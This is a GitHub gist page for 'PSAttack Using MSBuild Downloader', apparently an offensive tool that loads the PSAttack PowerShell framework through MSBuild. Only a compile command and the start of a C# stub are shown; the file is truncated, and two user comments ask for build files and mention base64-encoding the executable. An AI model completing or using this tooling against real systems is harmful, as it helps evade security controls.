Created
November 19, 2016 08:45
-
-
Save NickTyrer/92344766f1d4d48b15687e5e4bf6f93c to your computer and use it in GitHub Desktop.
PSAttack Using MSBuild Downloader
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371" | |
//Based on Jared Haight work (https://github.com/jaredhaight/PSAttack) | |
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs" | |
using System; | |
using System.Reflection; | |
namespace PSA64 | |
{ | |
class Program | |
{ | |
static void Main(string[] args) | |
{ |
View raw
(Sorry about that, but we can’t show files that are this big right now.)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
can you post your psa_msbuild64.csproj and psa_msbuild32.csproj getting errors trying to compile
tried using powershell and certutil to convert the pas64.exe to base64 but still not working